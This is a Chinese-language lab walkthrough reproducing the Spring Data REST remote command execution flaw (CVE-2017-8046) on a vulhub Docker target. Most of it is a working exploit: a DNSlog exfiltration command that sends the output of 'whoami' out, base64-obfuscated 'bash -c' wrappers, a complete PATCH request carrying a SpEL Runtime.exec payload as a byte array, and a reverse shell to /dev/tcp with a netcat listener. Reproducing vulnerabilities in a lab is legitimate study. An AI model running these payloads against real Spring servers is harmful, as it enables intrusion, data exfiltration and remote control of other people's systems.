Spring Data Rest远程命令执行漏洞
漏洞简述
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入
setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。
影响版本
pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3
pivotal Spring Boot < 2.0.0M4
pivotal Spring Data < Kay-RC3
环境搭建
cd /vulhub/spring/CVE-2017-8046/
docker-compose up -d
漏洞复现
访问http://192.168.3.151:8080
可以看到这个东西
访问http://192.168.3.151:8080/customers/1
打开dnslog,获取一个随机的dns
rmakrf.dnslog.cn
构造payload
curl `whoami`.rmakrf.dnslog.cn
然后打开base64,转换一下
bash -c {echo,Y3VybCBgd2hvYW1pYC5ybWFrcmYuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}
把上面那一段转换成ascii码
用PATCH请求来修改
PATCH /customers/1 HTTP/1.1
Host: 192.168.3.151:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,51,86,121,98,67,66,103,100,50,104,118,89,87,49,112,89,67,53,121,98,87,70,114,99,109,89,117,90,71,53,122,98,71,57,110,76,109,78,117,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]
把这个包传过去看看
在dns中出来了
构造反弹shell
bash -i >& /dev/tcp/192.168.3.134/4444 0>&1
先base64编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTM0LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
然后ascii码转换
设置监听端口
nc -lvvp 4444
把上面那东西替换,再次把包送过去
成了!
